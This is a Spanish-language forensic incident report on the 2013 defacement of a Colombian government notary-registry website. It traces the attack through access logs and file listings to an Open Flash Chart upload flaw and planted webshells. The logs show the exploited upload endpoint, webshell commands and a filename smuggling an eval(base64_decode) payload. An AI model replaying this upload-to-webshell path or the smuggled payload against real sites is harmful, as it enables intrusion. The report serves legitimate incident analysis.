On September 18, 2013 at 9:50 AM, the website www.supernotariado.gov.co was modified without authorization. An analysis of logs found that on this date, unauthorized files were uploaded to the site, including files named "indo.php", "botol.php", and "bokek.php". The incident affected the Superintendencia de Notariado y Registro. A forensic analysis was performed to investigate the incident and collect evidence from site logs and uploaded files.

1. Bogotá, Colombia Ver 4.0 04-08
GARS
INFORME DE INCIDENTE
Incidente No IM626153 Avance de Informe No FINAL
Zona de Evento BOGOTA Fecha y Hora de Evento 18-09-2013
Evento Reportado por ETB Fecha y Hora de Solución 19-09-2013
Tipo de Evento
Reporte Análisis Forense
Descripción de Evento
El día 18 de Septiembre de 2013 hacia las 09:50 AM, se reporta que el portal Web ha sido
modificado, sin que se hayan realizado maniobras sobre el mismo:
www.supernotariado.gov.co
A continuación se muestra la imagen de la evidencia en la que se observa que al abrir la página del cliente
aparece un aviso de que el sitio fue atacado:
Avances
Servicios Afectados
Superintendencia de Notariado y Registro

2. Bogotá, Colombia Ver 4.0 04-08
GARS
D
í
a
H
or
a
Descripción del Avance
1. Levantamiento de la evidencia.
Se inicia el levantamiento de la evidencia con la extracción de los siguientes datos:
- Log de acceso de los sitios atacados.
- Logs de errores de los sitios atacados.
- Información y copia de los archivos subidos al portal.
- Información y copia de los archivos modificados en el portal.
2. Análisis del caso
Se realiza la respectiva verificación de los logs de acceso para el día 18 de Septiembre, encontrando la
siguiente evidencia:
[seguridad@snrportal2 apacheSSL]$ grep POST saccess_log | grep --v ChartSBNR | grep -v 404
103.6.96.26 - - [18/Sep/2013:00:01:11 -0500] "POST /portalsnr/index.php%3foption=com_jnews
%26act=mailing%26task=view%26listid=18%26mailingid=8%26listype=1%26Itemid=999/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a79
81f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 400 226
103.6.96.26 - - [18/Sep/2013:00:01:14 -0500] "POST /portalsnr/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"
303 -
103.6.96.26 - - [18/Sep/2013:00:01:14 -0500] "POST /portalsnr/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a79
81f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
188.40.17.97 - - [18/Sep/2013:02:44:17 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:18 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:44:19 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52

3. Bogotá, Colombia Ver 4.0 04-08
GARS
110.45.146.219 - - [18/Sep/2013:02:44:35 -0500] "POST http://210.166.214.92:6667/ HTTP/1.0" 200 88
188.40.17.97 - - [18/Sep/2013:02:55:44 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:02:55:44 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:58:45 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:02:58:45 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?
option=com_jnews&act=mailing&task=view&listid=18&mailingid=8&listype=1&am
p;Itemid=999/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"
303 -
90.188.238.17 - - [18/Sep/2013:03:21:57 -0500] "POST /portalsnr/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"
303 -
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?
option=com_jnews&act=mailing&task=view&listid=18&mailingid=8&listype=1&am
p;Itemid=999/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a79
81f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
90.188.238.17 - - [18/Sep/2013:03:21:56 -0500] "POST /portalsnr/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a79
81f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
77.245.151.239 - - [18/Sep/2013:06:20:08 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:06:20:09 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:20:09 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:28:15 -0500] "POST

4. Bogotá, Colombia Ver 4.0 04-08
GARS
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:06:28:16 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:06:28:16 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
31.172.251.234 - - [18/Sep/2013:08:15:31 -0500] "POST /portalsnr//components//contact.php HTTP/1.1"
200 114934
81.130.21.114 - - [18/Sep/2013:08:32:26 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200
86351
81.130.21.114 - - [18/Sep/2013:08:36:57 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200
85764
81.130.21.114 - - [18/Sep/2013:08:39:42 -0500] "POST /portalsnr//components//contact.php HTTP/1.1" 200
60158
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=indo.php HTTP/1.1" 200 51
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:31 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:32 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
188.40.17.97 - - [18/Sep/2013:08:47:35 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
110.45.146.219 - - [18/Sep/2013:08:48:15 -0500] "POST http://210.166.214.92:6667/ HTTP/1.0" 200 88
134.3.82.219 - - [18/Sep/2013:08:56:41 -0500] "POST /supernotariado/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"
303 -
134.3.82.219 - - [18/Sep/2013:08:56:41 -0500] "POST /supernotariado/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a79

5. Bogotá, Colombia Ver 4.0 04-08
GARS
81f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
134.3.82.219 - - [18/Sep/2013:08:56:42 -0500] "POST /supernotariado/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20 HTTP/1.1"
303 -
134.3.82.219 - - [18/Sep/2013:08:56:46 -0500] "POST /supernotariado/index.php?
option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a79
81f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1" 303 -
91.221.0.124 - - [18/Sep/2013:09:12:44 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=default.php HTTP/1.1" 200 54
118.97.212.185 - - [18/Sep/2013:09:26:38 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php HTTP/1.1" 200
475
118.97.212.185 - - [18/Sep/2013:09:30:09 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/store.php?act=ls&d=
%2Fhtdocs%2Fportalsnr%2F&sort=0a HTTP/1.1" 200 6737
77.245.151.239 - - [18/Sep/2013:10:05:00 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:10:05:05 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:05:19 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:47:03 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=indo.php HTTP/1.1" 200 51
77.245.151.239 - - [18/Sep/2013:10:47:04 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=botol.php HTTP/1.1" 200 52
77.245.151.239 - - [18/Sep/2013:10:47:05 -0500] "POST
/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?
name=bokek.php HTTP/1.1" 200 52
En donde se observa que se realizaron peticiones POST al servidor, que hacen referencia a un archivo
llamado con extensión .php.
Al realizar la resolución de la URL:
https://surpenotariado.gov.co/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-

6. Bogotá, Colombia Ver 4.0 04-08
GARS
images/default.php
En donde se puede observar la interfaz de un Web Shell.
Se realiza prueba subiendo un archivo de texto llamado Prueba.txt. Se realiza la resolución de la URL:
supernotariado.gov.co/portalsnr/components/com_jnews/includes/openflashchart/php-ofc-
library/ofc_upload_image.php?name=prueba.txt
En donde se observa un mensaje dando aviso que el archivo se está siendo guardando en la ruta …/tmp-
upload-images/prueba.txt, con lo cual se concluye que el atacante aprovecho una de las vulnerabilidades
de un complemento llamado ofc_upload_image.php del Open Flash Chart para crear el archivo default.php
y acceder al sitio para instalar los archivos maliciosos. Estos archivos creados a través de este

7. Bogotá, Colombia Ver 4.0 04-08
GARS
complemento quedan guardados en la ruta
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/*
A continuación se realiza la revisión de los accesos a la ruta:
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/* encontrando la
siguiente evidencia:
stat /htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/*
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/abc.php'
Size: 431 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281260 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:29.000000000 -0500
Modify: 2013-08-06 13:54:26.000000000 -0500
Change: 2013-08-06 13:54:26.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/admin.php'
Size: 61830 Blocks: 136 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281585 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-12 11:10:36.000000000 -0500
Change: 2013-09-12 11:10:36.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/aka.php'
Size: 240709 Blocks: 480 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281391 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-03 04:31:32.000000000 -0500
Change: 2013-09-03 04:31:32.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/a.php'
Size: 2070 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281381 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-13 10:52:53.000000000 -0500
Change: 2013-09-13 10:52:53.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bokek.php'
Size: 17044 Blocks: 40 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281551 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-18 10:47:05.000000000 -0500
Change: 2013-09-18 10:47:05.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botis.php'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd08h/64776dInode: 24281605 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-17 15:51:37.000000000 -0500
Change: 2013-09-17 15:51:37.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botol.php'
Size: 776 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281606 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)

8. Bogotá, Colombia Ver 4.0 04-08
GARS
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-18 10:47:04.000000000 -0500
Change: 2013-09-18 10:47:04.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bot.php'
Size: 770 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281604 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:29.000000000 -0500
Modify: 2013-09-17 15:46:37.000000000 -0500
Change: 2013-09-17 15:46:37.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/cal.php'
Size: 478 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281382 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-16 06:42:55.000000000 -0500
Change: 2013-09-16 06:42:55.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/cams.php'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd08h/64776dInode: 24281598 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-17 00:00:32.000000000 -0500
Change: 2013-09-17 00:00:32.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php'
Size: 613 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281392 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:17:10.000000000 -0500
Modify: 2013-09-18 09:12:44.000000000 -0500
Change: 2013-09-18 09:12:44.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/edit.php'
Size: 61634 Blocks: 136 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281363 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-08-16 18:56:21.000000000 -0500
Change: 2013-08-16 18:56:21.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/
();eval(base64_decode(JHM9cGhwX3VuYW1lKCk7CmVjaG8gJzxicj4nLiRzOwoKZWNobyAnPGJyPic7Cn
Bhc3N0aHJ1KGlkKTsK));error'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd08h/64776dInode: 24281343 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-08-21 08:28:51.000000000 -0500
Change: 2013-08-21 08:28:51.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/home.php'
Size: 73380 Blocks: 152 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281597 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-13 23:54:30.000000000 -0500
Change: 2013-09-13 23:54:30.000000000 -0500

9. Bogotá, Colombia Ver 4.0 04-08
GARS
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/hun2.php'
Size: 68437 Blocks: 144 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281271 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-08-15 03:41:41.000000000 -0500
Change: 2013-08-15 03:41:41.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/inbox.php'
Size: 12062 Blocks: 24 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281559 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-03 23:31:20.000000000 -0500
Change: 2013-09-03 23:31:20.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/indo.php'
Size: 1524 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281599 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-18 10:47:03.000000000 -0500
Change: 2013-09-18 10:47:03.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/ipays.php'
Size: 240131 Blocks: 480 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281600 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-15 14:23:54.000000000 -0500
Change: 2013-09-15 14:23:54.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/ip.txt'
Size: 66 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281577 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-06 23:00:52.000000000 -0500
Change: 2013-09-06 23:00:52.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/kliverz.php'
Size: 3957 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281570 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:29.000000000 -0500
Modify: 2013-09-17 18:12:34.000000000 -0500
Change: 2013-09-17 18:12:34.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/load.php'
Size: 2442 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281576 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-06 22:59:10.000000000 -0500
Change: 2013-09-06 22:59:10.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/localhost.php'
Size: 3973 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281580 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:29.000000000 -0500

10. Bogotá, Colombia Ver 4.0 04-08
GARS
Modify: 2013-09-12 10:53:42.000000000 -0500
Change: 2013-09-12 10:53:42.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/menu.php'
Size: 73195 Blocks: 152 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281550 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-18 09:26:40.000000000 -0500
Change: 2013-09-18 09:26:40.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/own.php'
Size: 62587 Blocks: 136 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281560 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-04 00:22:10.000000000 -0500
Change: 2013-09-04 00:22:10.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/pass.php'
Size: 41080 Blocks: 88 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281601 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-16 14:31:33.000000000 -0500
Change: 2013-09-16 14:31:33.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/php.ini'
Size: 373 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281325 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-08-13 15:47:48.000000000 -0500
Change: 2013-08-13 15:48:08.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/pload.php'
Size: 474 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281305 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-15 14:09:22.000000000 -0500
Change: 2013-09-15 14:09:22.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/proc.php'
Size: 134566 Blocks: 272 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281578 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-06 23:00:52.000000000 -0500
Change: 2013-09-06 23:00:52.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/prueba.txt'
Size: 0 Blocks: 0 IO Block: 4096 regular empty file
Device: fd08h/64776dInode: 24281553 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:25:08.000000000 -0500
Modify: 2013-09-18 11:25:08.000000000 -0500
Change: 2013-09-18 11:25:08.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/Prueba.txt'
Size: 19 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281552 Links: 1

11. Bogotá, Colombia Ver 4.0 04-08
GARS
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-18 10:51:13.000000000 -0500
Change: 2013-09-18 10:51:13.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/readme.php'
Size: 73766 Blocks: 160 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281331 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-08-27 23:53:37.000000000 -0500
Change: 2013-08-27 23:53:37.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/shell.php'
Size: 1524 Blocks: 8 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281602 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-17 15:43:36.000000000 -0500
Change: 2013-09-17 15:43:36.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/store.php'
Size: 73780 Blocks: 160 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281281 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-07 09:04:09.000000000 -0500
Change: 2013-09-07 09:04:09.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/tux.php'
Size: 58128 Blocks: 128 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281320 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-08-13 15:43:39.000000000 -0500
Change: 2013-08-13 15:43:39.000000000 -0500
File: `/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/wp-app.php'
Size: 101722 Blocks: 208 IO Block: 4096 regular file
Device: fd08h/64776dInode: 24281590 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 508/usrnotariado) Gid: ( 509/notariado)
Access: 2013-09-18 11:15:30.000000000 -0500
Modify: 2013-09-13 10:53:09.000000000 -0500
Change: 2013-09-13 10:53:09.000000000 -0500
En donde se observa que en esta carpeta se están guardando los archivos que a través del webshell y de
la vulnerabilidad del Open Flash Chart se están subiendo al sitio. Como se evidencia, los archivos
default.php y prueba.txt se encuentran en esta carpeta.
De igual manera se realizó la búsqueda de los últimos archivos modificados en el sitio del cliente
encontrando las siguientes referencias:
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/kliverz.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bot.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/indo.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/shell.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/menu.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/bokek.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botis.php

12. Bogotá, Colombia Ver 4.0 04-08
GARS
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/botol.php
/htdocs/portalsnr/components/com_jnews/includes/openflashchart/tmp-upload-images/default.php
3. Resultados y conclusiones
A partir de la investigación se encontró que la modificación de los archivos fue posible a través de una
vulnerabilidad de un complemento llamado Open Flash Chart, con el cual se procedió a crear un archivo
que permitió el ingreso al sitio y por ende que el atacante haya podido subir archivos maliciosos a este.
El complemento Open Flash Chart se encuentra instalado por solicitud de SNR y dando cumplimiento a lo
requerido por los manuales de GEL en cuanto a información continúa hacia los ciudadanos
